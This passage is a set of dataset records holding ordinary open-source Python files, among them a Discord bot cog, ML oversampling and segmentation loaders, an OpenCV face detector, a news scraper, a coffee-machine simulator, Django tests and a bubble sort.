{discord.utils.format_dt(row[\"timestamp\"], style=\"R\")}')\n pages = [p for p in discord.utils.as_chunks(ret, 10)]\n for page in pages:\n pagenum += 1\n embeds.append(discord.Embed(\n title=f\"{member.name}'s previous names\",\n color=color, \n description=\"\\n\".join(page))\n .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n .set_footer(text=f\"Page {pagenum}/{len(pages)}\")\n )\n if len(embeds) == 1:\n return await ctx.send(embed=embeds[0])\n else:\n pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n pag.add_button(\"prev\", emoji=\"<:void_previous:1082283002207424572>\")\n pag.add_button(\"goto\", emoji=\"<:void_goto:1082282999187517490>\")\n pag.add_button(\"next\", emoji=\"<:void_next:1082283004321341511>\")\n pag.add_button(\"delete\", emoji=\"<:void_cross:1082283006649188435>\")\n await pag.start()\n\n @commands.command(\n name='clearnames',\n description='Clear your name history',\n usage='Syntax: ',\n aliases=['cn']\n )\n async def clearnames(self, ctx):\n await ctx.typing()\n data = await self.bot.db.fetch('SELECT * FROM names WHERE user_id = $1', ctx.author.id)\n if data:\n await self.bot.db.execute('DELETE FROM names WHERE user_id = $1', ctx.author.id)\n await ctx.success('Cleared your name history')\n if not data:\n await ctx.success(f\"No previously recorded names for {ctx.author.mention}\")\n\nasync def setup(bot):\n await bot.add_cog(Miscellaneous(bot))","repo_name":"hifthot/skidcity","sub_path":"void/cogs/Miscellaneous.py","file_name":"Miscellaneous.py","file_ext":"py","file_size_in_byte":16584,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"10411683944","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom sklearn.datasets import make_multilabel_classification\n\nimport torch\nimport os\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict\nimport random\n\n\n# In[ ]:\n\n\ndef IRLbl(y):\n LABELS = defaultdict(int)\n for sample in y:\n for label in sample:\n LABELS[label] += 1\n \n max_count = max(LABELS.values())\n for key,value in LABELS.items():\n print(f'{key} {LABELS[key]}')\n LABELS[key] = max_count/LABELS[key]\n \n \n return LABELS\n\n\n\ndef MeanIR(y,ratios=False):\n imb_ratios = IRLbl(y)\n # print(f'\\n ke {imb_ratios} \\n\\n\\n\\n')\n if ratios:\n return (sum(imb_ratios.values())/len(imb_ratios), imb_ratios)\n else:\n return (sum(imb_ratios.values())/len(imb_ratios))\n \n\n\n\ndef Label_Bags(X,y):\n \" Constructs Bags of samples for every label in the dataset. 
A label's Bag contains samples whose label set contains the label.\"\n assert(len(X) == len(y))\n Bags = defaultdict(list)\n for id, labels in enumerate(y):\n for label in labels:\n Bags[label].append([X[id],y[id]])\n return Bags\n\n\n\ndef ML_ROS(dataset, p):\n \n (X,y) = dataset\n X = list(X)\n y = list(y)\n\n samples_to_clone = len(X)*p/(100)\n mean_ir, imb_ratios = MeanIR(y=y, ratios=True)\n label_bags = Label_Bags(X,y)\n \n minBag = {}\n for label in label_bags.keys():\n if imb_ratios[label] > mean_ir:\n minBag[label] = label_bags[label]\n \n while samples_to_clone>0:\n if(minBag):\n for label in list(minBag):\n minBag_i = minBag[label]\n sample = random.sample(minBag_i,1)[0]\n\n minBag_i.append(sample)\n X.append(sample[0])\n y.append(sample[1])\n\n mean_ir, imb_ratios = MeanIR(y=y,ratios=True)\n if imb_ratios[label] <= mean_ir:\n minBag.pop(label)\n print(f'label {label} popped')\n samples_to_clone-=1\n print(f'{len(X)}, {samples_to_clone} mean_ir {mean_ir}')\n else:\n minBag = {}\n for label in label_bags.keys():\n if imb_ratios[label] > mean_ir:\n minBag[label] = label_bags[label]\n \n if not minBag: # no minority labels remain above MeanIR\n break\n return X,y\n \n\n","repo_name":"SaiTeja390/Oversampling","sub_path":"ML_ROS.py","file_name":"ML_ROS.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21703930124","text":"import sys\nimport argparse\nimport os\nimport numpy as np\nimport cv2\n\nparser = argparse.ArgumentParser(prog=sys.argv[0], description='detect object with webcam & opencv', allow_abbrev=False)\nparser.add_argument('--width',type=int, dest='width', required=True)\nparser.add_argument('--height',type=int, dest='height', required=True)\nparser.add_argument('--FPS',type=int, dest='FPS', required=True)\nparser.add_argument('--limit-buffer',dest='limitBuffer', action='store_true')\nargs = parser.parse_args()\n\nwidth=args.width\nheight=args.height\nFPS=args.FPS\nlimitBuffer=args.limitBuffer\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\ncap.set(cv2.CAP_PROP_FPS, FPS)\nif limitBuffer:\n cap.set(cv2.CAP_PROP_BUFFERSIZE,1)\n\n\n\nxml_path = '/home/devchu/.virtualenvs/cv/lib/python3.7/site-packages/cv2/data/'\nface_cascade = cv2.CascadeClassifier(xml_path + 'haarcascade_frontalface_default.xml')\n\n\n# only attempt to read if it is opened\nif cap.isOpened():\n while(True):\n ret, frame = cap.read()\n\n if ret:\n #cv2.imshow('frame',frame)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #cv2.imshow('gray',gray)\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n #for each face...\n for (x, y, w, h) in faces:\n # draw a rectangle around the face\n #gray = cv2.rectangle(gray, (x, y), (x+w, y+h), (255, 255, 255), 3)\n frame = cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 255, 255), 3)\n\n #cv2.imshow('gray', gray)\n cv2.imshow('frame', frame)\n else:\n print(\"Error reading capture device\")\n break\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\nelse:\n print(\"Failed to open capture device\")\n\n","repo_name":"elicorrales/eliraspberry4","sub_path":"Python/OpenCV/Fort.Laud.Robotics.Group.Meetups/loopFaceDetect.py","file_name":"loopFaceDetect.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"14878907769","text":"import sys\nimport json\nfrom newspaper import Article\nfrom newspaper import Config\nurl = sys.argv[1]\n\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\nconfig = Config()\nconfig.browser_user_agent = user_agent\n\narticle = Article(url, config=config)\n\narticle.download()\narticle.parse()\ntext = ' '.join(article.text.split(' ')[:1000])\n\nexport = {\n \"title\": article.title,\n \"text\": text\n}\n\napp_json = json.dumps(export)\nprint(app_json)\n\n\n\n\n# from requests import get\n# response = get(url)\n\n# extractor = Goose()\n# article = extractor.extract(raw_html=response.content)\n","repo_name":"2011-sagittarius/FakeNews","sub_path":"python/Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1739234328","text":"import asyncio\nimport time\nimport requests\n\nasync def function1(): #Download file\n url = 'https://www.facebook.com/favicon.ico'\n r = requests.get(url, allow_redirects=True)\n open('facebook.ico', 'wb').write(r.content)\n\n await asyncio.sleep(1)\n print(\"Function1\")\n return \"Abhay\"\n\nasync def function2():\n await asyncio.sleep(1)\n print(\"Function2\")\n\nasync def function3():\n await asyncio.sleep(4)\n print(\"Function3\")\n\nasync def main():\n \"\"\" task = asyncio.create_task(function1())\n #await function1()\n await function2()\n await function3() \"\"\"\n\n l = await asyncio.gather(\n function1(),\n function2(),\n function3(),\n )\n print(type(l),l)\n\nasyncio.run(main())","repo_name":"abhay2767/Python-Code","sub_path":"86_Async_Await.py","file_name":"86_Async_Await.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41272865061","text":"# myCoffeeMaker έκδοση 4, με χρήση κλάσεων και επέκταση των προδιαγραφών\n# περιλαμβάνει: διαχείριση των μετρητών, στατιστικά πωλήσεων \n# υλοποίηση undo σε οποιαδήποτε φάση της πληρωμής\n\nimport datetime\nimport os\n\ndir = os.path.dirname(__file__)\n\nclass Drink():\n panel = {}\n @staticmethod\n def printStats():\n print(10*'=', ' STATS ', 10*'=')\n for id,drink in Drink.panel.items():\n stats = \", \".join([':'.join([x, str(drink.stats[x])]) for x in drink.stats])\n print(f\"{drink.description}: {stats}\")\n print(30*'=')\n\n def __init__(self, id, description, price):\n self.id = str(id)\n self.description = description\n self.price = int(price)\n self.stats = {}\n Drink.panel[self.id] = self\n\n def buy(self):\n # διαχείριση διαλόγου με τον χρήστη για πληρωμή του ροφήματος\n # υλοποιεί τη δυνατότητα ακύρωσης παραγγελίας ενώ γίνεται η πληρωμή\n\n def message(myrest):\n print('επιστροφή:')\n for r in sorted(myrest):\n print(f\"{myrest[r]} x {r/100:.2f}€\")\n\n whatHappened = None\n self.paid = []\n toPay = self.price\n print(f'Πρέπει να πληρώσετε {self.price/100:.2f}€')\n print('Δεκτά νομίσματα: ', end=\"\")\n for coin, obj in Coin.cashier.items():\n print(f\"{obj.description}, \", end=\"\")\n print()\n while True: # διαδικασία πληρωμής\n try:\n print(f'οφείλετε ακόμη {(self.price-sum(self.paid))/100:.2f}€')\n # print(f'οφείλετε ακόμη {toPay/100:.2f}€')\n # υλοποίηση ακύρωσης πληρωμής σε οποιαδήποτε ενδιάμεση φάση\n reply = input(f'Πληρωμή({\",\".join([f\"{x/100:.2f}\" for x in Coin.cashier.keys()])}) ή x (cancel):')\n if reply.lower() == 'x':\n # to return coins 
self.price - toPay\n whatHappened = (False, dict([(x, self.paid.count(x)) for x in self.paid]))\n message(whatHappened[1])\n toPay = 0\n break\n else:\n paid = float(reply)\n if paid in [x/100 for x in Coin.cashier.keys()]:\n paid = int(paid*100)\n self.paid.append(paid)\n else: continue\n except: continue\n toPay -= paid\n if toPay <= 0: break # the amount has been paid\n if toPay < 0:\n whatHappened = Coin.giveRest(self.price, self.paid)\n message(whatHappened[1])\n if whatHappened and whatHappened[0]: \n print('Απολαύστε το ρόφημά σας....')\n today = datetime.datetime.now().strftime('%d-%m-%Y')\n self.stats[today] = self.stats.get(today, 0) + 1\n # update the cash register \n toUpdateCashier = {}\n for item in self.paid:\n toUpdateCashier[item] = toUpdateCashier.get(item,0) + 1\n for item in whatHappened[1]:\n toUpdateCashier[item] = toUpdateCashier.get(item,0) - whatHappened[1][item]\n print(toUpdateCashier)\n for coin in toUpdateCashier:\n Coin.cashier[coin].ammount += toUpdateCashier[coin]\n\nclass Coin():\n cashier = {}\n @staticmethod\n def printCashier():\n print(10*'=', 'CASHIER', 10*'=')\n total = 0\n for val,coin in Coin.cashier.items():\n print(f\"{coin.description}: {coin.ammount}\")\n total += val * coin.ammount\n print(f'TOTAL {total/100:5.2f}€')\n print(30*'=')\n\n @staticmethod\n def giveRest(drinkPrice, paid):\n '''method that, for a given amount to be paid (drinkPrice), checks whether there is\n change to give; if so, it accepts the coins of the paid list and returns the change;\n if not, it returns the coins of paid and sends a corresponding message that the\n purchase does not proceed; returns (True/False, restCoins)'''\n \n toReturn = sum(paid) - drinkPrice # the amount that must be returned\n if toReturn < 0:\n return (False, {}) # purchase not completed, the transaction is still in progress (not enough money)\n if toReturn == 0:\n return (True, {})\n # provisional state of the cash register if the money we just received is added\n tempCashier = {}\n for coin in Coin.cashier:\n tempCashier[coin] = Coin.cashier[coin].ammount\n for coin in paid:\n tempCashier[coin] += 1\n \n # check whether we can give change\n restCoins = {}\n for coin in sorted(tempCashier.keys(), reverse=True ):\n quantity = toReturn//coin\n if quantity :\n if tempCashier[coin] >= quantity:\n restCoins[coin] = quantity\n else:\n restCoins[coin] = tempCashier[coin]\n toReturn -= coin * restCoins[coin]\n if not toReturn: # change found\n return (True, restCoins)\n else: # no change found\n print('undo.... 
δεν υπάρχουν ρέστα, πληρώστε ακριβές ποσό.')\n restCoins = {}\n for coin in paid:\n restCoins[coin] = restCoins.get(coin, 0) + 1\n return (False, restCoins)\n\n def __init__(self, description, value, ammount):\n self.description = description\n self.value = int(value)\n self.ammount = int(ammount)\n Coin.cashier[self.value] = self\n\nclass Controller():\n def __init__(self):\n self.loadDrinks(os.path.join(dir,'drinks.txt'))\n self.loadCoins(os.path.join(dir,'coins.txt'))\n\n def loadDrinks(self, filename):\n for drink in open(filename, 'r', encoding='utf8'):\n drink = drink.strip().split(';')\n Drink(*drink)\n\n def loadCoins(self, filename):\n for coin in open(filename, 'r', encoding='utf8'):\n coin = coin.strip().split(';')\n Coin(*coin)\n \n def run(self):\n # main loop - menu\n while True:\n Coin.printCashier() # coins left\n Drink.printStats() # sales statistics TODO: store them in a file\n print('Επιλέξτε ρόφημα:')\n for id,d in Drink.panel.items():\n print(f\"{d.id}: {d.description} - Τιμή: {d.price/100:2.2f}€\")\n print(\"0: Έξοδος\")\n selection = input('Επιλογή:')\n if selection == \"0\": break\n if selection in Drink.panel.keys():\n selected = Drink.panel[selection]\n selected.buy()\n\n# main program\nif __name__ == \"__main__\": # run the program from the CLI\n loader = Controller()\n loader.run()","repo_name":"navouris/myCoffee","sub_path":"coffee_v4/myCoffee4.py","file_name":"myCoffee4.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"el","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41156363666","text":"# coding: utf-8 _*_\nfrom django.test import TestCase\nfrom apps.ventas.models.Producto import Producto\nfrom apps.ventas.models.Departamento import Departamento\nfrom apps.ventas.models.Categoria import Categoria\nfrom apps.ventas.models.UnidadMedida import UnidadMedidaC\nfrom apps.ventas.models.UnidadMedida import UnidadMedidaV\nfrom apps.ventas.models.Venta import Venta\nfrom apps.ventas.models.Venta_Detalle import Detalle_Venta\nfrom apps.clivet.models.cliente import Cliente\nfrom backengo.sad.models import User\nfrom apps.params.models import Person\n\n# Create your tests here.\n\n\nclass ProductoTestCase(TestCase):\n\n def setUp(self):\n\n a1 = Departamento.objects.create(descripcion=\"departamentoprueba\")\n a2 = Categoria.objects.create(\n descripcion=\"Categoriatest\", departamento=a1)\n a3 = UnidadMedidaV.objects.create(\n nombre=\"kilogramosprueba\", simbolo=\"kg\")\n a4 = UnidadMedidaC.objects.create(\n nombre=\"arobas\", simbolo=\"@\", cant_equivalencia=12, unidad_medida_venta=a3)\n Producto.objects.create(\n nombre=\"productoTests00000001\", codigo=\"0001test\", categoria=a2, fechaVencimiento='2026-12-12', unidad_medida=a4, precioV=2.20, precioC=2.00, existencia=0.00, MontoReal=0.00, igv=0.00)\n Producto.objects.create(\n nombre=\"productoTests00000002\", codigo=\"0002test\", categoria=a2, fechaVencimiento='2016-12-12', unidad_medida=a4, precioV=2.20, precioC=2.00, existencia=0.00, MontoReal=0.00, igv=0.00)\n\n def test_animals_can_speak(self):\n \"\"\"Products are created with the expected codes\"\"\"\n productoTests00000001 = Producto.objects.get(\n nombre=\"productoTests00000001\")\n productoTests00000002 = Producto.objects.get(\n nombre=\"productoTests00000002\")\n self.assertEqual(productoTests00000001.codigo, '0001test')\n self.assertEqual(productoTests00000002.codigo, '0002test')\n\n\nclass VentaTestCase(TestCase):\n\n def setUp(self):\n\n persona = 
Person.objects.create(first_name=\"German\")\n cliente = Cliente.objects.create(persona=persona)\n usuario = User.objects.create(username=\"germancastrovilchez\")\n departamento = Departamento.objects.create(\n descripcion=\"departamentoprueba\")\n categoria = Categoria.objects.create(\n descripcion=\"Categoriatest\",\n departamento=departamento)\n unidadV = UnidadMedidaV.objects.create(\n nombre=\"kilogramosprueba\", simbolo=\"kg\")\n unidadC = UnidadMedidaC.objects.create(\n nombre=\"arobas\",\n simbolo=\"@\",\n cant_equivalencia=12,\n unidad_medida_venta=unidadV)\n p1 = Producto.objects.create(\n nombre=\"productoTests00000001\",\n codigo=\"0001test\",\n categoria=categoria,\n fechaVencimiento='2026-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p2 = Producto.objects.create(\n nombre=\"productoTests00000002\",\n codigo=\"0002test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p3 = Producto.objects.create(\n nombre=\"productoTests00000003\",\n codigo=\"0003test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p4 = Producto.objects.create(\n nombre=\"productoTests00000004\",\n codigo=\"0004test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p5 = Producto.objects.create(\n nombre=\"productoTests00000005\",\n codigo=\"0005test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p6 = Producto.objects.create(\n nombre=\"productoTests00000006\",\n codigo=\"0006test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n venta = Venta.objects.create(\n fechav='2016-12-12',\n total=18,\n cliente=cliente,\n user=usuario,\n igv=3.24)\n Detalle_Venta.objects.create(\n producto=p1,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p2,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p3,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p4,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p5,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p6,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n\n def test_animals_can_speak(self):\n \"\"\"The sale's detail rows and products are created correctly\"\"\"\n productoTests00000001 = Producto.objects.get(\n nombre=\"productoTests00000001\")\n productoTests00000002 = Producto.objects.get(\n nombre=\"productoTests00000002\")\n productoTests00000003 = Producto.objects.get(\n nombre=\"productoTests00000003\")\n productoTests00000004 = Producto.objects.get(\n nombre=\"productoTests00000004\")\n productoTests00000005 = Producto.objects.get(\n nombre=\"productoTests00000005\")\n productoTests00000006 = Producto.objects.get(\n nombre=\"productoTests00000006\")\n CantidadP = Detalle_Venta.objects.filter(venta=1)\n self.assertEqual(CantidadP.count(), 6)\n self.assertEqual(productoTests00000001.nombre, 'productoTests00000001')\n 
self.assertEqual(productoTests00000002.nombre, 'productoTests00000002')\n self.assertEqual(productoTests00000003.nombre, 'productoTests00000003')\n self.assertEqual(productoTests00000004.nombre, 'productoTests00000004')\n self.assertEqual(productoTests00000005.nombre, 'productoTests00000005')\n self.assertEqual(productoTests00000006.nombre, 'productoTests00000006')\n","repo_name":"AngieChambi/CopaisegSIS","sub_path":"apps/ventas/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37049373981","text":"# encoding:utf-8\n\nimport json\nimport os\nfrom common.log import logger\n\nconfig = {\n \"open_ai_api_key\": \"YOUR API KEY\",\n \"model\": \"gpt-3.5-turbo\",\n \"proxy\": \"\",\n \"single_chat_prefix\": [\"bot\", \"@bot\"],\n \"single_chat_reply_prefix\": \"\",\n \"group_chat_prefix\": [\"@bot\"],\n \"group_name_white_list\": [\"ChatGPT测试群\", \"ChatGPT测试群2\"],\n \"image_create_prefix\": [\"画\", \"发\", \"找\"],\n \"speech_recognition\": False,\n \"voice_reply_voice\": False,\n \"conversation_max_tokens\": 1000,\n \"expires_in_seconds\": 36000,\n \"character_desc\": \"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。\"\n}\n\n\ndef load_config():\n global config\n config.update(\n {\n \"open_ai_api_key\": os.getenv(\"open_ai_api_key\", \"YOUR API KEY\"),\n \"model\": os.getenv(\"model\", \"gpt-3.5-turbo\"),\n \"single_chat_prefix\": os.getenv(\"single_chat_prefix\", \"bot @bot\").split(),\n \"group_chat_prefix\": os.getenv(\"group_chat_prefix\", \"bot @bot\").split(),\n \"group_name_white_list\": os.getenv(\"group_name_white_list\", \"ChatGPT测试群 ChatGPT测试群2\").split(),\n }\n )\n # config_path = \"config.json\"\n # if not os.path.exists(config_path):\n # raise Exception('配置文件不存在,请根据config-template.json模板创建config.json文件')\n #\n # config_str = read_file(config_path)\n # # 将json字符串反序列化为dict类型\n # config = json.loads(config_str)\n\n logger.info(\"[INIT] load config: {}\".format(config))\n\n\ndef get_root():\n return os.path.dirname(os.path.abspath(__file__))\n\n\ndef read_file(path):\n with open(path, mode='r', encoding='utf-8') as f:\n return f.read()\n\n\ndef conf():\n return config\n","repo_name":"lamthun/chatgpt-on-wechat2","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37621749576","text":"import tensorflow as tf\n\n\nclass Dataset:\n\n def __init__(self, config):\n self.config = config\n self.train_image_list = self.config['train_image_list']\n self.train_mask_list = self.config['train_mask_list']\n self.val_image_list = self.config['val_image_list']\n self.val_mask_list = self.config['val_mask_list']\n\n def __len__(self):\n self.assert_dataset()\n return {\n 'train': len(self.train_image_list),\n 'val': len(self.val_image_list)\n }\n\n def assert_dataset(self):\n pass\n\n def read_image(self, image_path, img_height=800, img_width=1600, mask=False, flip=0):\n image = tf.io.read_file(image_path)\n if not mask:\n image = tf.cast(tf.image.decode_png(image, channels=3), dtype=tf.float32)\n image = tf.image.resize(images=image, size=[img_height, img_width])\n image = tf.image.random_brightness(image, max_delta=50.)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n image = tf.image.random_hue(image, max_delta=0.2)\n image = tf.image.random_contrast(image, lower=0.5, upper=1.5)\n image = 
tf.clip_by_value(image, 0, 255)\n image = tf.case([\n (tf.greater(flip, 0), lambda: tf.image.flip_left_right(image))\n ], default=lambda: image)\n image = image[:, :, ::-1] - tf.constant([103.939, 116.779, 123.68])\n else:\n image = tf.image.decode_png(image, channels=1)\n image = tf.cast(tf.image.resize(images=image, size=[\n img_height, img_width]), dtype=tf.uint8)\n image = tf.case([\n (tf.greater(flip, 0), lambda: tf.image.flip_left_right(image))\n ], default=lambda: image)\n return image\n\n def random_crop(self, image, mask):\n image_dims = image.shape\n offset_h = tf.random.uniform(\n shape=(1,),\n maxval=image_dims[0] - self.config['patch_height'],\n dtype=tf.int32\n )[0]\n offset_w = tf.random.uniform(\n shape=(1,),\n maxval=image_dims[1] - self.config['patch_width'],\n dtype=tf.int32\n )[0]\n image = tf.image.crop_to_bounding_box(\n image, offset_height=offset_h,\n offset_width=offset_w,\n target_height=self.config['patch_height'],\n target_width=self.config['patch_width']\n )\n mask = tf.image.crop_to_bounding_box(\n mask, offset_height=offset_h,\n offset_width=offset_w,\n target_height=self.config['patch_height'],\n target_width=self.config['patch_width']\n )\n return image, mask\n\n def map_function(self, image_path, mask_path):\n flip = tf.random.uniform(\n shape=[1, ], minval=0, maxval=2, dtype=tf.int32)[0]\n image, mask = self.read_image(\n image_path, flip=flip\n ), self.read_image(\n mask_path, mask=True, flip=flip\n )\n image, mask = self.random_crop(image, mask)\n return image, mask\n\n def get_datasets(self):\n train_dataset = tf.data.Dataset.from_tensor_slices(\n (self.train_image_list, self.train_mask_list)\n )\n train_dataset = train_dataset.shuffle(buffer_size=128)\n train_dataset = train_dataset.map(\n map_func=self.map_function,\n num_parallel_calls=tf.data.experimental.AUTOTUNE,\n )\n train_dataset = train_dataset.batch(\n batch_size=self.config['train_batch_size'],\n drop_remainder=True\n )\n train_dataset = train_dataset.repeat()\n train_dataset = train_dataset.prefetch(\n tf.data.experimental.AUTOTUNE\n )\n val_dataset = tf.data.Dataset.from_tensor_slices(\n (self.val_image_list, self.val_mask_list)\n )\n val_dataset = val_dataset.map(\n map_func=self.map_function,\n num_parallel_calls=tf.data.experimental.AUTOTUNE,\n )\n val_dataset = val_dataset.batch(\n batch_size=self.config['val_batch_size'],\n drop_remainder=True\n )\n val_dataset = val_dataset.repeat()\n val_dataset = val_dataset.prefetch(\n tf.data.experimental.AUTOTUNE\n )\n return train_dataset, val_dataset\n","repo_name":"bogdan-s/DeepLabV3-Plus","sub_path":"src/datasets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"7943140892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 4 10:23:32 2019\n\n@author: Nicco\nthis code contains all the useful routines to compute energy spectrum for PBC Bogoliubov Hamiltonian\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tck\nimport matplotlib.colors as clr\nfrom mpl_toolkits.mplot3d import Axes3D # registers the '3d' projection on older matplotlib\nimport Code1\n# NOTE: the free names vals, vecs, Ltilde, a, t, mu, delta and the fx module used\n# below are assumed to be provided by Code1 (e.g. when run after Code1 in the same session)\n\n#calculation of impulses of eigenvectors employing translational invariance of states\nkx=np.zeros(len(vals))\nky=np.zeros(len(vals))\nfor r in range(len(vals)):\n kx[r]=-1j*np.log(vecs[0,r]/vecs[1,r])/a \n ky[r]=-1j*np.log(vecs[Ltilde,r]/vecs[0,r])/a\n if (np.abs(vecs[0,r])<10**-8)&(np.abs(vecs[1,r])<10**-8): #correct behaviour when kx and ky should be zero (bit of workaround)\n kx[r]=-1j*np.log((vecs[Ltilde**2,r])/(vecs[1+Ltilde**2,r]))/a\n if (np.abs(vecs[Ltilde,r])<10**-8)&(np.abs(vecs[0,r])<10**-8):\n 
ky[r]=-1j*np.log((vecs[Ltilde+Ltilde**2,r])/(vecs[Ltilde**2,r]))/a\n\n#3D surface figure, setting parameters\nasc=np.linspace(-np.pi/a,np.pi/a,100)\nasc,ordin=np.meshgrid(asc,asc) \nfig=plt.figure(1)\nax=fig.add_subplot(111, projection='3d')\nax.set_xlabel('kx')\nax.set_ylabel('ky')\nax.set_title('a='+str(a)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nax.view_init(0, 90)\n#sets the ticks on axis in multiples of pi\nax.xaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\nax.xaxis.set_major_locator(tck.MultipleLocator(base=1.0))\nax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\nax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n\n#theoretical bogoliubov dispersion\nax.plot_surface(asc, ordin, fx.enbog(asc,ordin,t,a,mu,delta), alpha=0.2,color='b')\nax.plot_surface(asc, ordin, -fx.enbog(asc,ordin,t,a,mu,delta), alpha=0.2,color='b')\n#calculated eigenvalues\nax.scatter(kx,ky,vals,'bo',s=20,c='r')\n \n#continuum limit \n#ax.plot_surface(asc, ordin, fx.en(asc,ordin,t,a,mu0), alpha=0.5) #energy with finite spacing\n#ax.plot_surface(asc, ordin, fx.enbogcont(asc,ordin,t,mu0,delta), alpha=0.2,color='red')\nplt.show()\n\n#heat plot to understand outliers\nkpos=np.array([])\nfor i in range(len(vals)):\n if (vals[i]>=0):\n kpos=np.append(kpos,i)\n\n#heat plot of upper band of bogoliubov dispersion\nfig=plt.figure()\nax=fig.add_subplot(111)\nax.set_title('Ltilde='+str(Ltilde)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nax.set_xlabel('kx')\nax.set_ylabel('ky')\nasc=np.linspace(-np.pi/a,np.pi/a,100)\nasc,ordin=np.meshgrid(asc,asc)\nmezzival=Ltilde**2\nax.set_title('a='+str(a)+', t='+str(t)+', mu='+str(mu)+', delta='+str(delta))\nmi = np.min((vals[mezzival:].min(), fx.enbog(asc,ordin,t,a,mu,delta).min()))\nma = np.max((vals[mezzival:].max(), fx.enbog(asc,ordin,t,a,mu,delta).max()))\nnorm = clr.Normalize(vmin=mi,vmax=ma)\nax.contourf(asc,ordin,fx.enbog(asc,ordin,t,a,mu,delta),200,norm=norm)\naxp=ax.scatter(kx[mezzival:],ky[mezzival:],c=vals[mezzival:],norm=norm,edgecolors='black')\ncb = plt.colorbar(axp)\n \n\n\n","repo_name":"nbaldelli/anyons_pwave","sub_path":"OldCodes/PBCBOG.py","file_name":"PBCBOG.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38887254696","text":"# Bubble sort\n\ndef bubble(value):\n # outer loop: number of passes over the data: length - 1\n for i in range(len(value) - 1):\n # flag marking whether a swap happened this pass\n flag = False\n # inner loop: number of comparisons of\n # adjacent elements during each pass\n # -1: accounts for the slot occupied by element j+1\n # -i: accounts for the maxima already placed (outer loop)\n for j in range(len(value)-1 - i):\n # ascending sort by default; swap if the former is greater than the latter\n if value[j] > value[j+1]:\n # swap the data\n value[j], value[j+1] = value[j+1], value[j]\n flag = True\n # if no swap happened, the remaining data is already ordered;\n # no need to keep traversing, exit the loop\n if flag == False:\n break 